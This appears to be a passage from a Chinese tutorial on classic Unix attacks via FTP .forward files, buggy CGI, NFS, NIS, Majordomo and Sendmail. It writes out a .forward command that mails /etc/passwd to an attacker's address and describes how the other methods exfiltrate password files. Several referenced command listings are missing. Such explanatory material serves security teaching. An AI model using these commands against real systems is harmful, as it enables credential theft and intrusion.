如果匿名FTP主目錄可寫，可以寫一個".forward"文件;文件內(nèi)容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉(zhuǎn)發(fā)的。如果某一用戶(此處為FTP)的主目錄下有這個文件時，那么，當(dāng)該用戶收到郵件時，就要視".forward"的內(nèi)容進(jìn)行轉(zhuǎn)發(fā):如果".forward"的內(nèi)容為一些電子郵件地址，該郵件就被轉(zhuǎn)發(fā)到這些地址;而如果為一行用雙引號引起來的Shell命令，則該郵件的內(nèi)容被重定向到此命令。此處，命令為:"|/bin/cat/etc/passwd|sed's/^//'|/bin/mail me@my.e-mail.addr"，實際上對重定向過來的作為輸入的郵件內(nèi)容沒有做任何處理，而是把/etc/passwd(為了防止被安全機(jī)制過濾，先在每一行行首增加一個空格)發(fā)到了攻擊者的電子郵件地址(me@my.e-mail.addr)。因此。在有這樣一個".forward"文件后，再隨便發(fā)一封電子郵件給victim.cor上的FTP用戶，通過這種"轉(zhuǎn)發(fā)"功能，victim.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上來了。

WWW攻擊

很多WWW服務(wù)器都有預(yù)裝的CGI程序，其中有些程序由于設(shè)計上的失誤，使得攻擊者可以利用它們來做一些設(shè)計者意想不到的事情，如隨意執(zhí)行服務(wù)器主機(jī)上的任何命令。下面是幾個著名的Buggy CGI:

這幾種方法都可以得到目標(biāo)主機(jī)上的/etc/passwd(當(dāng)然,前提都是該機(jī)提供WWW服務(wù)并且cgi-bin下放有這幾種Buggy(CGI)。

NFS攻擊

如果某用戶的主目錄共享出來，嘗試如下操作:

walt的UID為10101，于是在本地創(chuàng)建一個名為“walt”,UID為“10101”的用戶，用su命令在本地成為這個用戶(攻擊者在本地應(yīng)該是

冒充用戶walt在安裝過來的sun8.com的/users/walt下 (即walt在sun8.com上的主目錄下)放一個".forward"文件，再發(fā)一封電子郵件給該用戶，根據(jù)上面已經(jīng)講過的道理，郵件轉(zhuǎn)發(fā)機(jī)制就會把sun8.com的/etc/passwd文件郵寄給攻擊者了。

Sniffer攻擊

由于大多數(shù)網(wǎng)絡(luò)數(shù)據(jù)流是明文傳輸?shù)模栽趶V播性質(zhì)的以太網(wǎng)內(nèi)。任何一臺主機(jī)都可以竊聽到其他主機(jī)間的任何通信包，包括用于網(wǎng)絡(luò)登錄用戶認(rèn)證的口令。獲得用戶口令后,自然可以冒充該用戶登錄到攻擊目標(biāo)上去。Sniffer的局限是:攻擊者和被攻擊者必須在同一個以太局域網(wǎng)內(nèi)，這通常不僅意味著物理上的鄰近，而且意味著組織和部門上的鄰近，即一般攻擊者為內(nèi)部人員。

NIS攻擊

NIS(Network Information System:網(wǎng)絡(luò)信息系統(tǒng))用于網(wǎng)絡(luò)管理信息的共享和統(tǒng)一管理。一般情況下，諸如Passwd、hosts、networks、alias等系統(tǒng)配置信息都是分散在各臺主機(jī)上，各不相干。但實際上這些信息在同一個子網(wǎng)內(nèi)往往是公共的，NIS即是為這些信息提供一個統(tǒng)一的存放地點(NIS服務(wù)器)，這樣不僅可以避免重復(fù)，還容易保持這些信息的一致性。NIS又稱Yellow Page，故其命令都以yp-開頭;后來又有新的NIS+，其命令改成以nis-開頭。

這類攻擊會先猜測域名，然后用ypcat(或?qū)τ贜IS+:niscat)可獲得passwd(甚至shadow)頂用NIS后，用戶口令信息從NIS服務(wù)器上獲取。若能控制NIS服務(wù)器，就可以創(chuàng)建郵件別名。

假設(shè)攻擊者控制了NIS服務(wù)器，在該服務(wù)器上建立一個名叫"foo"的別名，則這個別名為該NIS域內(nèi)所有的主機(jī)共享，其中包括攻擊目標(biāo)victim.com，所以當(dāng)攻擊者發(fā)一封信到foo@victim.com時，victim.com就從NIS服務(wù)器取得別名"foo"的定義，即:把victim.com上的/etc/passwd文件發(fā)送到攻擊者的電子郵件地址。

E-mail攻擊

電子郵件看上去好像是一種最無害的網(wǎng)絡(luò)服務(wù)，但在黑客看來，每個開向網(wǎng)絡(luò)的窗口都可能成為通向系統(tǒng)的大門。以下是一個利用majordomo(ver.1.94.3)漏洞的例子。

Majordomo是一種電子郵寄列表(Mailing list)服務(wù)器，所謂Mailing list是服務(wù)器維護(hù)著的一張電子郵件地址的表，服務(wù)器負(fù)責(zé)把所有發(fā)向該列表的信件轉(zhuǎn)發(fā)到列表中的每個電子郵件地址。這樣就可以形成一個虛擬的公共場所。在其中，每個人的聲音都可以被所有其他的人聽到。Majordomo被全世界眾多的Mailing list廣泛使用，其特定版本V.1.94.3中有一個漏洞，黑客可以利用這個漏洞在目標(biāo)機(jī)上運行任何Shell腳本，方法是把這個腳本放在自己的Home目錄下，并保證本地機(jī)允許目標(biāo)機(jī)用RCP拷貝這個腳本，然后向該郵件列表發(fā)一封電子郵件，在Reply-to域中鍵入上列的字符串。

如果腳本內(nèi)容如上所示，則該Majornomo程序?qū)涯繕?biāo)上的/etc/passwd寄給攻擊者。

Sendmail攻擊

利用Sendmail 5.55的漏洞攻擊如下:

效果類似，會得到victim.com的passwd文件。再接著利用/etc/aliases,pag。aliases.pag是/etc/aliases編譯后的形態(tài)。在許多系統(tǒng)中這個文件是對所有人可寫的(World-writable)。

本地的uuencode程序生成一個編碼流，文件名為'etc/aliases.pag"，內(nèi)容與本地decode相同，并作為電子郵件發(fā)給victim.com上的decode別名，victim.com收到該郵件后，把這個編碼流重定向到解碼程序uudecode,uudecode則恢復(fù)文件內(nèi)容。并試圖把它存為/etc/aliases.pag;如果daemon對/etc/aliases.pag有寫權(quán)限，則改寫成功，于是victim.com上獻(xiàn)出現(xiàn)一個別名"bin"——它所做的正是發(fā)送攻擊者需要的passwd文件到其電子郵箱。